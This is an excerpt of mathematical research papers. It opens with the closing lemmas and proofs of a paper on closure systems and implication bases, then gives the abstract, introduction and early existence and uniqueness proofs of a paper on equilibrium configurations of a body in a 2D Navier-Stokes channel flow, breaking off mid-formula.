X,\phi_{2}\rangle\) be two closure systems on \(X\). Let \(F_{1}\) be the family of closed sets associated with \(\langle X,\phi_{1}\rangle\) and let \(F_{2}\) be the family of closed sets associated with \(\langle X,\phi_{2}\rangle\). Suppose that \(F_{1}\subsetneq F_{2}\). Then there exists a a quasi-closed set \(Q\) associated with \(\langle X,\phi_{1}\rangle\) such that \(Q\in F_{2}\)._ Proof.: Since \(X\) is finite, we may let \(A\) be a member of \(F_{2}\setminus F_{1}\) such that no subset of \(A\) is in \(F_{2}\setminus F_{1}\). Then for all \(B\in F_{1}\), \(A\cap B\) either equals \(A\) or is in \(F_{1}\), so \(A\) is a quasi-closed set of \(\langle X,\phi_{1}\rangle\). The next lemma establishes a connection between quasi-closed sets and the right sides of implications. **Lemma 2**.: _Let \(X\) be a finite set, let \(\langle X,\phi\rangle\) be a closure system on \(X\), and let \(F\) be the family of closed sets associated with \(\langle X,\phi\rangle\). Let \(\Sigma\) be a set of implications on \(X\). Let \(F_{\Sigma}\) be the family of closed sets associated with \(\Sigma\). Then \(F_{\Sigma}=F\) if and only if the following two conditions hold:_ 1. _For every implication_ \((A\to B)\in\Sigma\)_,_ \(B\subseteq\phi(A)\)_._ 2. _For every quasi closed set_ \(Q\) _associated with_ \(\langle X,\phi\rangle\)_, there exists an implication_ \((A\to B)\in\Sigma\) _such that_ \(A\subseteq Q\) _and_ \(B\not\subseteq Q\)_._ Proof.: If condition (1) holds, then for any \(S\in F\) and any \((A\to B)\in\Sigma\), \(A\subseteq S\implies\phi(A)\subseteq S\implies B\subseteq S\), so \(S\in F_{\Sigma}\); then it follows that \(F\subseteq F_{\Sigma}\). Condition (2) implies that for any quasi-closed set \(Q\) associated with \(F\), \(Q\not\in F_{\Sigma}\). Then by Lemma 1, \(F_{\Sigma}\) is not a proper super set of \(F\), so \(F_{\Sigma}=F\). The reverse direction is straightforward. If condition (1) fails and \(A\to B\) is an implication in \(\Sigma\) such that \(B\not\subseteq\phi(A)\), then \(\phi(A)\not\in F_{\Sigma}\) (and \(\phi(A)\in F\)). If condition (2) fails and \(Q\) is a quasi-closed set associated with \(\langle X,\phi\rangle\) such that for all \((A\to B)\in\Sigma\), \(A\subseteq Q\implies B\subseteq Q\), then \(Q\in F_{\Sigma}\) (and \(Q\not\in F\)). The following theorem establishes a form of independence between implications corresponding to distinct essential sets. **Theorem 3**.: _Let \(\langle X,\phi\rangle\) be a finite closure system, let \(E_{1},...,E_{n}\) be the essential sets of \(\langle X,\phi\rangle\), and let \(\Sigma_{1},...,\Sigma_{n}\) be implication bases for \(\langle X,\phi\rangle\). For each \(i\), let \(\Sigma^{\prime}_{i}=\{(A\to B)\in\Sigma_{i}:\phi(A)=E_{i}\}\). Let \(\Sigma=\cup\Sigma^{\prime}_{i}\). Then \(\Sigma\) is a valid implication basis of \(\langle X,\phi\rangle\)._ Proof.: Since every implication in \(\Sigma\) is included in another valid implication basis of \(\langle X,\phi\rangle\), \(\Sigma\) satisfies condition (1) of Lemma 2. Let \(Q\) be a quasi closed set associated with \(\langle X,\phi\rangle\), and let \(E_{i}=\phi(Q)\). By Lemma 2, we may let \(A\to B\) be an implication in \(\Sigma_{i}\) such that \(A\subseteq Q\) and \(B\not\subseteq Q\). Then \(\phi(A)\not\subseteq Q\), and since \(Q\) is quasi-closed it follows that \(\phi(A)=\phi(Q)=E_{i}\). Therefore \((A\to B)\in\Sigma\). It now follows that \(\Sigma\) satisfies condition (2) of Lemma 2, so \(\Sigma\) is a valid implication basis for \(\langle X,\phi\rangle\). The following corollary resolves Conjecture 67 of [1]. **Corollary 4**.: _Let \(\langle X,\phi\rangle\) be a finite closure system, let \(E\) be an essential set of \(\langle X,\phi\rangle\), and let \(\Sigma\) be an optimal basis for \(\langle X,\phi\rangle\). If \(A_{1}\to B_{1},...,A_{n}\to B_{n}\) are all the implications in \(\Sigma\) where \(\phi(A_{i})=E\), then \(s=|B_{1}|+...+|B_{n}|\) is fixed (i.e., \(s\) does not depend on the choice of \(\Sigma\))._ Proof.: Let \(\sigma\) be the saturation operator associated with \(\langle X,\phi\rangle\). Let \(\Sigma^{\prime}\) be another optimal basis for \(\langle X,\phi\rangle\) where \(A^{\prime}_{1}\to B^{\prime}_{1},...,A^{\prime}_{n}\to B^{\prime}_{n}\) are all the implications in \(\Sigma^{\prime}\) with \(\phi(A^{\prime}_{i})=E\) and \(\sigma(A^{\prime}_{i})=\sigma(A_{i})\). For each \(i\), \(|A^{\prime}_{i}|=|A_{i}|\) because \(A_{i}\) and \(A^{\prime}_{i}\) have minimal cardinality among all sets with saturation equal to \(\sigma(A_{i})\)[1, Theorem 5 (c)]. Let \(s^{\prime}=|B^{\prime}_{1}|+...+|B^{\prime}_{n}|\) and assume without loss of generality that \(s^{\prime}\leq s\). Let \(\Sigma^{\prime\prime}=\{A\to B\mid(A\to B)\in\Sigma^{\prime}\wedge\phi(A)=E\} \cup\{A\to B\mid(A\to B)\in\Sigma\wedge\phi(A)\neq E\}\). By Theorem 3, \(\Sigma^{\prime\prime}\) is a valid basis for \(\langle X,\phi\rangle\). By construction, the size (i.e. the sum of all cardinalities of the left and right sides each implication) of \(\Sigma^{\prime\prime}\) is no greater than the size of \(\Sigma\). But \(\Sigma\) is optimal, so the size of \(\Sigma^{\prime\prime}\) must equal the size of \(\Sigma\), and it follows that \(s^{\prime}=s\).
2304.01180
Asymmetric equilibrium configurations of a body immersed in a 2D laminar flow
We study the equilibrium configurations of a possibly asymmetric fluid-structure-interaction problem. The fluid is confined in a bounded planar channel and is governed by the stationary Navier-Stokes equations with laminar inflow and outflow. A body is immersed in the channel and is subject to both the lift force from the fluid and to some external elastic force. Asymmetry, which is motivated by natural models, and the possibly non-vanishing velocity of the fluid on the boundary of the channel require the introduction of suitable assumptions to prevent collisions of the body with the boundary. With these assumptions at hand, we prove that for sufficiently small inflow/outflow there exists a unique equilibrium configuration. Only if the inflow, the outflow and the body are all symmetric, the configuration is also symmetric. A model application is also discussed.
Edoardo Bocchi, Filippo Gazzola
2023-04-03T17:50:30Z
http://arxiv.org/abs/2304.01180v2
# Asymmetric equilibrium configurations ###### Abstract. We study the equilibrium configurations of a possibly asymmetric fluid-structure-interaction problem. The fluid is confined in a bounded planar channel and is governed by the stationary Navier-Stokes equations with laminar inflow and outflow. A body is immersed in the channel and is subject to both the lift force from the fluid and to some external elastic force. Asymmetry, which is motivated by natural models, and the possibly non-vanishing velocity of the fluid on the boundary of the channel require the introduction of suitable assumptions to prevent collisions of the body with the boundary. With these assumptions at hand, we prove that for sufficiently small inflow/outflow there exists a unique equilibrium configuration. Only if the inflow, the outflow and the body are all symmetric, the configuration is also symmetric. A model application is also discussed. **Mathematics Subject Classification:** 35Q35, 76D05, 74F10. ## 1. Introduction Let \(L>H>0\) and consider the rectangle \(R=(-L,L)\times(-H,H)\). Let \(B\subset R\) be a closed smooth domain having barycenter at the origin \((x_{1},x_{2})=(0,0)\) and such that \(\operatorname{diam}(B)\ll L,H\). We study the behavior of a stationary laminar (horizontal) fluid flow going through \(R\) and filling the domain \(\Omega_{h}=R\setminus B_{h}\), where \(B_{h}=B+he_{2}\) for some \(h\) (a vertical translation of \(B\)), see Figure 1. Note that \(B_{0}=B\). The fluid is governed by the stationary 2D Navier-Stokes equations \[-\mu\Delta u+u\cdot\nabla u+\nabla p=0,\quad\nabla\cdot u=0\quad\text{in}\quad \Omega_{h}, \tag{1.1}\] complemented with inhomogeneous Dirichlet boundary conditions on \(\partial\Omega_{h}=\partial B_{h}\cup\partial R\), see (2.4) below. Here, \(\mu>0\) is the kinematic viscosity, \(u\) is the velocity vector field, \(p\) is the scalar pressure. The body \(B\) is subject to two vertical forces. The first force (the lift) is due to the fluid flow and tends to move \(B\) away from its original position \(B_{0}\), it is expressed through a boundary integral over \(\partial B\), see (3.1) below. The second force is mechanical (elastic) and acts as a restoring force tending to maintain \(B\) in \(B_{0}\). When there is no inflow/ouflow, the body is only subject to the restoring force and remains in Figure 1. The rectangle \(R\) and the body \(B\) with its vertical displacements \(B_{h}\). which is the unique equilibrium position. But, as soon as there is a fluid flow, these two forces start competing and one may wonder if the body remains in \(B_{0}\) or, at least, if the equilibrium position remains unique. We show that, if the inflow/ouflow is sufficiently small, then the equilibrium position of \(B\) remains unique and coincides with \(B_{h}\) for some \(h\) close to zero. We point out that, contrary to [3, 7, 9], _we make no symmetry assumptions neither on \(B\) nor on the laminar inflow/outflow_. Therefore, not only the overall configuration will be asymmetric but also some of the techniques developed in these papers do not work and \(B_{h}\) may be different from \(B_{0}\). The motivation for studying asymmetric configurations comes from nature. Only very few bodies are perfectly symmetric and most fluid flows, although laminar in the horizontal direction, are asymmetric in the vertical direction: think of an horizontal wind depending on the altitude or the water flow in a river depending on the distance from the banks. Figure 2 shows two front waves in sandstorms that have no vertical symmetry although the wind is (almost) horizontally laminar. In Section 2 we give a detailed description of our model and we prove that, for small Reynolds numbers, the Navier-Stokes equations are uniquely solvable in any \(\Omega_{h}\), see Theorem 2.2. The related a priori bounds depend on \(h\), and this is one crucial difference compared to the (symmetric) Poiseuille inflow/outflow considered in [3]. It is well-known [4] that to solve inhomogeneous Dirichlet problems for the Navier-Stokes equations, one needs to find a solenoidal extension of the boundary data and to transform the original problem in an homogeneous Dirichlet problem with an additional source term. For the existence issue, one can use the classical Hopf extension, but there are infinitely many other possible choices for the solenoidal extension. One of them, introduced in [10], was used in [3] to write the lift force as a volume integral by means of the solution of an auxiliary Stokes problem. For asymmetric flows, the same solenoidal extension does not allow to estimate all the boundary terms and, in order to obtain refined bounds for the solution to the Navier-Stokes equations in \(\Omega_{h}\), we build a new explicit solenoidal extension that also plays a fundamental role in the analysis of the subsequent fluid-structure-interaction (FSI) problem. The main physical interest in FSI problems is to determine the \(\omega\)-limit of the associated evolution equations because this allows to forecast the long-time behavior of the Figure 2. Front wave of two wind storms. structure. Since the evolution Navier-Stokes equations are dissipative, one is led to investigate if the global attractor exists, see [6, 13]: the main difficulty is that the corresponding phase space is time-dependent and semigroup theory does not apply. The global attractor contains stationary solutions of the evolution FSI problem that we call equilibrium configurations, which are investigated in the present work. In Section 3 we introduce the lift force and the restoring force and we set up the steady-state FSI problem. Our main result (Theorem 3.1) states that, for small Reynolds numbers, the equilibrium position is unique and may differ from \(B_{0}\). To prove this result, we need some bounds on the lift force in proximity of collisions of \(B_{h}\) with \(\partial R\): these bounds are collected in Theorem 3.2 and proved in Section 4 by using the very same solenoidal extension introduced in Section 2. The remaining part of the proof of Theorem 3.1 is divided in two steps. In Subsection 5.1 we prove some properties of the global force exerted on the body \(B\). These properties are then used in Subsection 5.2 to complete the proof by means of an implicit function argument, combined with some delicate bounds involving derivatives of moving boundary integrals. We emphasize that for our FSI problem we cannot use the explicit expression of the lift derivative as in [15] because the displacements \(B_{h}\) within \(R\) do not follow the normal of \(\partial B_{h}\), in particular if \(\partial B_{h}\) contains some vertical segments. Instead, based on the general approach introduced in [2] (see also the previous work [12]), we compute with high precision the lift variation with respect to the vertical displacement parameter \(h\) of \(B_{h}\) by acting directly on the strong form of the FSI problem. Section 6 contains the symmetric version of Theorem 3.1, see Theorem 6.1 which states that, under symmetry assumptions on the inflow/outflow and on \(B\), for small Reynolds numbers the equilibrium position is unique and coincides with \(B_{0}\). This extends former results in [3, 7, 9] to a wider class of symmetric frameworks. As an application of our results, in Section 7 we consider a model where \(B_{h}\) represents the cross-section of the deck of a suspension bridge [5], while \(\Omega_{h}\) is filled by the air and represents either a virtual box around the deck or a wind tunnel around a scaled model of the bridge. Since the deck may have a nonsmooth boundary, we also explain how to extend our results to the case where \(B\) is merely Lipschitz. ## 2. Fluid boundary-value problem Let \(R\) and \(B\) be as in Section 1 (Figure 1) with \[B\text{ of class }W^{2,\infty}. \tag{2.1}\] On the one hand, (2.1) ensures the regularity \((u,p)\in H^{2}(\Omega_{h})\times H^{1}(\Omega_{h})\) for the solutions to (1.1), see [12, Theorem 2.1] and Theorem 2.2 below. On the other hand, in engineering applications \(B\) is usually a polygon with rounded corners, see Section 7, which belongs to \(W^{2,\infty}\) but not to \(C^{2}\). Let \[\delta_{b}:=-\min_{(x_{1},x_{2})\in\partial B}x_{2}>0,\quad\delta_{t}:=\max_{ (x_{1},x_{2})\in\partial B}x_{2}>0,\quad\tau:=\max_{(x_{1},x_{2})\in\partial B }|x_{1}|. \tag{2.2}\] Since we consider vertical displacements \(B_{h}\) within \(R\), we have \(h\in(-H+\delta_{b},H-\delta_{t})\) and \(B_{h}\subset[-\tau,\tau]\times[h-\delta_{b},h+\delta_{t}]\) for any such \(h\). Then, \(\partial\Omega_{h}=\partial B_{h}\cup\partial R\). The bottom and top parts of \(\partial R\) are respectively \[\Gamma_{b}=[-L,L]\times\{-H\}\quad\text{and}\quad\Gamma_{t}=[-L,L]\times\{H\},\] while its lateral left and right parts are, respectively, \[\Gamma_{l}=\{-L\}\times[-H,H]\quad\text{and}\quad\Gamma_{r}=\{L\}\times[-H,H].\] Let \(V_{\text{in}},V_{\text{out}}\in W^{2,\infty}(-H,H)\cap C^{0}[-H,H]\) satisfy \[\begin{split} V_{\text{in}}(-H)=V_{\text{out}}(-H)=0,\quad V_{ \text{in}}(H)=V_{\text{out}}(H)=U\geq 0,\\ \int_{-H}^{H}V_{\text{in}}(x_{2})dx_{2}=\int_{-H}^{H}V_{\text{out }}(x_{2})dx_{2}.\end{split} \tag{2.3}\] For some \(\lambda\geq 0\), we consider the boundary-value problem \[\begin{split}-\mu\Delta u+u\cdot\nabla u+\nabla p=0,\qquad \nabla\cdot u=0\quad\text{in}\quad\Omega_{h},\\ u_{|_{\partial B_{h}}}\!=\!u_{|_{\Gamma_{b}}}\!=0,\quad u_{|_{ \Gamma_{t}}}\!=\lambda Ue_{1},\quad u_{|_{\Gamma_{l}}}\!=\lambda V_{\text{in} }(x_{2})e_{1},\quad u_{|_{\Gamma_{r}}}\!=\lambda V_{\text{out}}(x_{2})e_{1}. \end{split} \tag{2.4}\] Note that \(u_{|_{\partial R}}\in C^{0}(\partial R)\) and (2.3)-(2.4) are compatible with the Divergence Theorem. The role of \(\lambda\geq 0\) in the boundary conditions is to measure with a unique parameter the strength of both the inflow and outflow and \(\lambda/\mu\) is the Reynolds number. **Definition 2.1**.: We say that \((u,p)\in H^{2}(\Omega_{h})\times H^{1}(\Omega_{h})\) is a strong solution to (2.4) if the differential equations are satisfied a.e. in \(\Omega_{h}\) and the boundary conditions are satisfied as restrictions (recall that \(H^{2}(\Omega_{h})\subset C^{0}(\overline{\Omega_{h}})\)). We now state an apparently classical existence and uniqueness result which, however, has some novelties. First, since the domain \(\Omega_{h}\) is only Lipschitzian, the regularity of the solution is obtained through a geometric reflection. More important, the explicit upper bound for the blow-up of the \(H^{1}\)-norm of the unique solution to (2.4) in proximity of collision: when \(B\) approaches \(\Gamma_{t}\) the norm remains bounded while when \(B\) approaches \(\Gamma_{b}\) we estimate its blow-up. This refined bound requires the construction of a suitable solenoidal extension of the boundary data. Note that, up to normalization, we can reduce to the cases where \[U\in\{0,1\}. \tag{2.5}\] In order to state the result, we define the distances of the body \(B_{h}\) to \(\Gamma_{b}\) and \(\Gamma_{t}\) respectively by \[\varepsilon_{b}(h):=H-\delta_{b}+h,\qquad\varepsilon_{t}(h):=H-\delta_{t}-h. \tag{2.6}\] Hence, \(0<\varepsilon_{b}(h),\varepsilon_{t}(h)\leq 2H-\delta_{b}-\delta_{t}\) for any \(h\in(-H+\delta_{b},H-\delta_{t})\). Throughout the paper, any (positive) constant depending only on \(\mu\), \(B_{0}\), \(L\), \(H\) will be denoted by \(C\) and, when it depends also on \(h\), by \(C_{h}\). We may now state **Theorem 2.2**.: _Let \(h\in(-H+\delta_{b},H-\delta_{t})\) and assume (2.3) with (2.5). Then (2.4) admits a strong solution \((u,p)\) for any \(\lambda\geq 0\) and there exists \(\Lambda>0\) such that the solution is unique if \(\lambda\in[0,\Lambda)\). Moreover, there exist \(C>0\) and \(C_{h}>0\) such that the unique solution (when \(\lambda<\Lambda\)) satisfies_ \[\|u\|_{H^{1}(\Omega_{h})}\leq C(1+U(\varepsilon_{t}(h))^{-3/2})\lambda, \tag{2.8}\] \[\|u\|_{H^{2}(\Omega_{h})}+\|p\|_{H^{1}(\Omega_{h})}\leq C_{h}\lambda. \tag{2.7}\] _A priori bounds such as (2.7) and (2.8) are available for any \(\lambda\geq 0\) and any strong solution of (2.4), but with different powers of \(\lambda\)._ Proof.: _Existence of weak solutions._ For later use, we first define weak solution for the forced Navier-Stokes equations \[-\mu\Delta u+u\cdot\nabla u+\nabla p=f,\qquad\nabla\cdot u=0\quad\text{in} \quad\Omega_{h}, \tag{2.9}\] which reduces to (2.4) when \(f=0\). We say that \(u\in H^{1}(\Omega_{h})\) is a weak solution to (2.9) with \(f\in L^{2}(\Omega_{h})\) if \(u\) is a solenoidal vector field satisfying the boundary conditions in the trace sense and \[\mu\int_{\Omega_{h}}\nabla u:\nabla\varphi+\int_{\Omega_{h}}u\cdot\nabla u \cdot\varphi=\int_{\Omega_{h}}f\cdot\varphi \tag{2.10}\] for all \(\varphi\in W(\Omega_{h}):=\{\varphi\in H^{1}_{0}(\Omega_{h}):\nabla\cdot \varphi=0\text{ a.e. in }\Omega_{h}\}\). For any weak solution \(u\), there exists a unique associated \(p\in L^{2}_{0}(\Omega_{h})\) (_i.e._ with zero mean value), satisfying \[\mu\int_{\Omega_{h}}\nabla u:\nabla\psi+\int_{\Omega_{h}}u\cdot\nabla u\cdot \psi-\int_{\Omega_{h}}p\nabla\cdot\psi=\int_{\Omega_{h}}f\cdot\psi \tag{2.11}\] for all \(\psi\in H^{1}_{0}(\Omega_{h})\) (Lemma IX.1.2, [4]). We introduce the well-known Hopf's solenoidal extension \(s\) and recast (2.4) as (2.9) with homogeneous boundary conditions \[-\mu\Delta v+v\cdot\nabla v+\nabla p=f,\quad\nabla\cdot v=0\quad\text{in} \quad\Omega_{h},\qquad v_{|_{\partial\Omega_{h}}}=0, \tag{2.12}\] where \(f=\mu\Delta s-s\cdot\nabla v-v\cdot\nabla s-s\cdot\nabla s\). Then there exists \(v\in W(\Omega_{h})\) satisfying (2.10) for any \(\lambda\geq 0\) (Theorem IX.4.1, [4]). This is equivalent to say that the vector field \(u=v+s\in H^{1}(\Omega_{h})\) and the associated pressure \(p\in L^{2}(\Omega_{h})\) satisfy (2.10)-(2.11) with \(f=0\). Moreover, \(\nabla\cdot u=0\), \(u_{|_{\partial\Omega_{h}}}=s_{|_{\partial\Omega_{h}}}\) and \[\begin{split}\|u\|_{H^{1}(\Omega_{h})}&\leq C(\| \nabla v\|_{L^{2}(\Omega_{h})}+\|s\|_{H^{1}(\Omega_{h})})\\ &\leq C((1+\tfrac{1}{\mu})\|s\|_{H^{1}(\Omega_{h})}+\tfrac{1}{\mu} \|s\|_{H^{1}(\Omega_{h})}^{2})\leq C_{h}(\lambda+\lambda^{2})\,,\end{split} \tag{2.13}\] \[\|p\|_{L^{2}(\Omega_{h})}\leq C(\mu\|u\|_{H^{1}(\Omega_{h})}+\|u\|_{H^{1}( \Omega_{h})}^{2})\leq C_{h}(\lambda+\lambda^{4}). \tag{2.14}\] In these bounds and the ones below we only emphasize the smallest and largest powers of \(\lambda\), as for any polynomial. These bounds are not part of the statement but they will be used later in the present proof. _Regularity._ We claim that any weak solution \((u,p)\) to (2.4) satisfies \((u,p)\in H^{2}(\Omega_{h})\times H^{1}(\Omega_{h})\). This would be straightforward if \(\Omega_{h}\in W^{2,\infty}\), see [12], but \(R\) is only Lipschitzian. Here, we take advantage of the particular shape of \(R\) and use a reflection argument as in [8]. We construct a new domain \(\Omega_{h}^{t}=R^{t}\setminus B_{h}^{t}\), obtained by reflecting \(\Omega_{h}\) across \(\Gamma_{t}\), where \(R^{t}=[-L,L]\times[H,3H]\) and \(B_{h}^{t}\) is the reflection of \(B_{h}\) with respect to \(\Gamma_{t}\). Define \((u^{t},p^{t}):\Omega_{h}^{t}\to\mathbb{R}^{2}\times\mathbb{R}\) by \[u_{1}^{t}(x_{1},H+x_{2})=u_{1}(x_{1},H-x_{2}),\quad u_{2}^{t}(x_{1},H+x_{2})=-u _{2}(x_{1},H-x_{2}),\] \[p^{t}(x_{1},H+x_{2})=p(x_{1},H-x_{2}),\] which satisfies \[-\mu\Delta u^{t}+u^{t}\cdot\nabla u^{t}+\nabla p^{t}=0,\quad\nabla\cdot u^{t}= 0\quad\text{in}\quad\Omega_{h}^{t}. \tag{2.15}\] Similarly, let \(\Omega_{h}^{b}=R^{b}\setminus B_{h}^{b}\) with \(R^{b}=[-L,L]\times[-3H,-H]\) and \(B_{h}^{b}\) is the reflection of \(B_{h}\) with respect to \(\Gamma_{b}\). Define \((u^{b},p^{b}):\Omega_{h}^{b}\to\mathbb{R}^{2}\times\mathbb{R}\) by \[u_{1}^{b}(x_{1},-H-x_{2})=u_{1}(x_{1},-H+x_{2}),\quad u_{2}^{b}( x_{1},-H-x_{2})=-u_{2}(x_{1},-H+x_{2}),\] \[p^{b}(x_{1},-H-x_{2})=p(x_{1},-H+x_{2}),\] which satisfies the corresponding of (2.15) in \(\Omega_{h}^{b}\). With the same principle, we then perform two horizontal reflections of \(\Omega_{h}^{b}\cup\Omega_{h}\cup\Omega_{h}^{t}\) with respect to \(x_{1}=\pm L\). We define \(\widetilde{R}=(-3L,3L)\times(-3H,3H)\) and \(\widetilde{\Omega}_{h}=\widetilde{R}\setminus\cup_{i}\overline{B_{h}^{i}}\) where \(B_{h}^{i}\) is either \(B_{h}\) or one of its eight reflections. Then, if \((\widetilde{u},\widetilde{p}):\widetilde{\Omega}_{h}\to\mathbb{R}^{2}\times \mathbb{R}\) denotes the extension of \((u,p)\), \[-\mu\Delta\widetilde{u}+\widetilde{u}\cdot\nabla\widetilde{u}+\nabla \widetilde{p}=0,\quad\nabla\cdot\widetilde{u}=0\quad\text{in}\quad\widetilde{ \Omega}_{h},\qquad\widetilde{u}_{|_{\partial B_{h}}}=0 \tag{2.16}\] and \(\tilde{u}\) satisfies further boundary conditions that we do not need to make explicit here. After introducing a suitable solenoidal extension, we can proceed as in the first part of the proof and obtain the existence of a solution \((\widetilde{u},\widetilde{p})\in H^{1}(\widetilde{\Omega}_{h})\times L^{2}( \widetilde{\Omega}_{h})\) satisfying the bounds (2.13)-(2.14). Hence, \(\widetilde{u}\cdot\nabla\widetilde{u}\in L^{3/2}(\widetilde{\Omega}_{h})\) and \[\|\widetilde{u}\cdot\nabla\widetilde{u}\|_{L^{3/2}(\widetilde{\Omega}_{h})} \leq\|\widetilde{u}\|_{L^{6}(\widetilde{\Omega}_{h})}\|\nabla\widetilde{u}\|_{ L^{2}(\widetilde{\Omega}_{h})}\leq C\|\widetilde{u}\|_{H^{1}(\widetilde{\Omega}_{h})}^{2} \leq C_{h}(\lambda^{2}+\lambda^{4}) \tag{2.17}\] with \(C_{h}=C(\widetilde{\Omega}_{h})\). By applying [4, Theorem IV.5.1] to the Stokes problem (2.16), we infer that \((\widetilde{u},\widetilde{p})\in W^{2,3/2}(\Omega^{\prime})\times W^{1,3/2}( \Omega^{\prime})\) for any \(\Omega^{\prime}\subset\widetilde{\Omega}_{h}\) and \[\begin{split}&\|\widetilde{u}\|_{W^{2,3/2}(\Omega^{\prime})}+\| \widetilde{p}\|_{W^{1,3/2}(\Omega^{\prime})}\\ &\leq C_{h}(\|\widetilde{u}\cdot\nabla\widetilde{u}\|_{L^{3/2}( \widetilde{\Omega}_{h})}+\|\widetilde{u}\|_{W^{1,3/2}(\widetilde{\Omega}_{h})} +\|\widetilde{p}\|_{L^{3/2}(\widetilde{\Omega}_{h})})\leq C_{h}(\lambda+ \lambda^{4})\end{split} \tag{2.18}\] with \(C_{h}=C(\Omega^{\prime},\widetilde{\Omega}_{h})\). We recall that \((\widetilde{u},\widetilde{p})=(u,p)\) in \(\Omega_{h}\). Then, using Sobolev embedding \(W^{2,3/2}\hookrightarrow W^{1,6}\) in \(\mathbb{R}^{2}\) and a bootstrap argument we obtain that \((u,p)\in H^{2}(\Omega_{h})\times H^{1}(\Omega_{h})\). Moreover, from (2.17)-(2.18) we get \[\begin{split}\|u\|_{H^{2}(\Omega_{h})}+\|p\|_{H^{1}(\Omega_{h})}& \leq C_{h}(\|\widetilde{u}\cdot\nabla\widetilde{u}\|_{L^{2}(\Omega^{ \prime})}+\|\widetilde{u}\|_{H^{1}(\Omega^{\prime})}+\|\widetilde{p}\|_{L^{2}( \Omega^{\prime})})\\ &\leq C_{h}(\|\widetilde{u}\|_{L^{3}(\Omega^{\prime})}\|\nabla \widetilde{u}\|_{L^{6}(\Omega^{\prime})}+\|\widetilde{u}\|_{H^{1}(\Omega^{ \prime})}+\|\widetilde{p}\|_{L^{2}(\Omega^{\prime})})\\ &\leq C_{h}(\|\widetilde{u}\|_{H^{1}(\Omega^{\prime})}\| \widetilde{u}\|_{W^{2,3/2}(\Omega^{\prime})}+\|\widetilde{u}\|_{H^{1}(\Omega^ {\prime})}+\|\widetilde{p}\|_{L^{2}(\Omega^{\prime})})\\ &\leq C_{h}(\lambda+\lambda^{4})\end{split}\] with \(C_{h}=C(\Omega_{h},\widetilde{\Omega}_{h})\). _Uniqueness._ Let \(u_{1}\) and \(u_{2}\) be two weak solutions to (2.4), let \(w=u_{1}-u_{2}\), then \[\mu\int_{\Omega_{h}}\nabla w:\nabla\varphi+\int_{\Omega_{h}}w\cdot\nabla w \cdot\varphi=-\int_{\Omega_{h}}(w\cdot\nabla u_{2}+u_{2}\cdot\nabla w)\cdot\varphi\] for all \(\varphi\in W(\Omega_{h})\). Then take \(\varphi=w\) so that the latter yields \[\begin{split}\mu\|\nabla w\|_{L^{2}(\Omega_{h})}^{2}& =-\int_{\Omega_{h}}\!\!w\cdot\nabla u_{2}\cdot w\leq\|\nabla u_{2}\|_{L^{2}( \Omega_{h})}\|w\|_{L^{4}(\Omega_{h})}^{2}\\ &\leq C_{h}(1+\frac{1}{\mu})(\lambda+\lambda^{2})\|\nabla w\|_{L^{ 2}(\Omega_{h})}^{2},\end{split} \tag{2.19}\] where we used Holder, Ladyzhenskaya and Poincare inequalities and (2.13). Hence, there exists \(\Lambda>0\) such that \[\lambda\in[0,\Lambda)\iff C_{h}(1+\tfrac{1}{\mu})(\lambda+\lambda^{2})<\mu \tag{2.20}\] and this condition implies \(\|\nabla w\|_{L^{2}(\Omega_{h})}=0\) and, in turn, \(w=0\) since \(w_{|_{\partial\Omega_{h}}}=0\). _Refined bounds._ For \(\lambda\in[0,\Lambda)\), in all the above bounds we can drop the largest power of \(\lambda\) and they all become linear upper bounds. We treat separately the cases \(U=1\) and \(U=0\) and we make explicit the dependence of the constant \(C_{h}\) in (2.13) on \(h\). When \(U=1\), we claim that the unique strong solution \(u\) to (2.4) satisfies \[\|u\|_{H^{1}(\Omega_{h})}\leq C\big{(}1+(\varepsilon_{t}(h))^{-3/2}\big{)}\lambda \tag{2.21}\] with \(C>0\) independent of \(h\). To this end, we introduce a different (and explicit) solenoidal extension. Consider the cut-off functions \(\zeta_{l},\zeta_{r}\in C^{\infty}(\mathbb{R}^{2})\), with \(0\leq\zeta_{l},\zeta_{r}\leq 1\), defined piece-wise in the regions of Figure 3 by \[\zeta_{l}(x_{1},x_{2})=\begin{cases}0&\text{in}\quad[-\tau,\tau]\times[-H,H- \frac{\varepsilon_{t}(h)}{2}]\cup[\tau,L]\times[-H,H],\\ 1&\text{in}\quad[-L,-2\tau]\times[-H,H],\\ \zeta_{l}(x_{1})&\text{in}\quad[-2\tau,-\tau]\times[-H,H-\frac{\varepsilon_{t }(h)}{2}],\\ \zeta_{l}(x_{1},x_{2})&\text{in}\quad[-2\tau,-\tau]\times[H-\frac{\varepsilon_ {t}(h)}{2},H],\end{cases} \tag{2.22}\] and \[\zeta_{r}(x_{1},x_{2})=\begin{cases}0&\text{in}\quad[-\tau,\tau]\times[-H,H- \frac{\varepsilon_{t}(h)}{2}]\ \cup\\ &\quad[-L,-\tau]\times[-H,H-\frac{\varepsilon_{t}(h)}{4}],\\ 1&\text{in}\quad[2\tau,L]\times[-H,H-\frac{\varepsilon_{t}(h)}{4}],\\ \zeta_{r}(x_{1})&\text{in}\quad[\tau,2\tau]\times[-H,H-\frac{\varepsilon_{t }(h)}{2}],\\ \zeta_{r}(x_{1},x_{2})&\text{in}\quad[-\tau,2\tau]\times[H-\frac{\varepsilon_ {t}(h)}{2},H-\frac{\varepsilon_{t}(h)}{4}],\\ 1-\zeta_{l}&\text{in}\quad[-L,L]\times[H-\frac{\varepsilon_{t}(h)}{4},H]. \end{cases} \tag{2.23}\] Then, letting \(\nabla^{\perp}=(-\partial_{2},\partial_{1})\), consider the vector field \(s:R\to\mathbb{R}^{2}\) defined by \[s(x_{1},x_{2}):=-\lambda\nabla^{\perp}\left(\zeta_{l}(x_{1},x_{2})\int_{-H}^{ x_{2}}V_{\text{in}}(z)dz+\zeta_{r}(x_{1},x_{2})\int_{-H}^{x_{2}}V_{\text{out}}(z)dz \right), \tag{2.24}\] Figure 3. The cut-off functions \(\zeta_{l}\) (left) and \(\zeta_{r}\) (right) on \(\overline{R}\) when \(U=1\). which is solenoidal and satisfies the boundary conditions in (2.4). Rewriting \(s\) as \[s(x_{1},x_{2})=\lambda\left(-\nabla^{\perp}\zeta_{l}\int_{-H}^{x_{2}}V_{\rm in}- \nabla^{\perp}\zeta_{r}\int_{-H}^{x_{2}}V_{\rm out}+(\zeta_{l}V_{\rm in}+\zeta_ {r}V_{\rm out})e_{1}\right),\] its partial derivatives read \[\partial_{1}s=\lambda\left(-\nabla^{\perp}\partial_{1}\zeta_{l}\int_{-H}^{x_{2 }}V_{\rm in}-\nabla^{\perp}\partial_{1}\zeta_{r}\int_{-H}^{x_{2}}V_{\rm out}+( 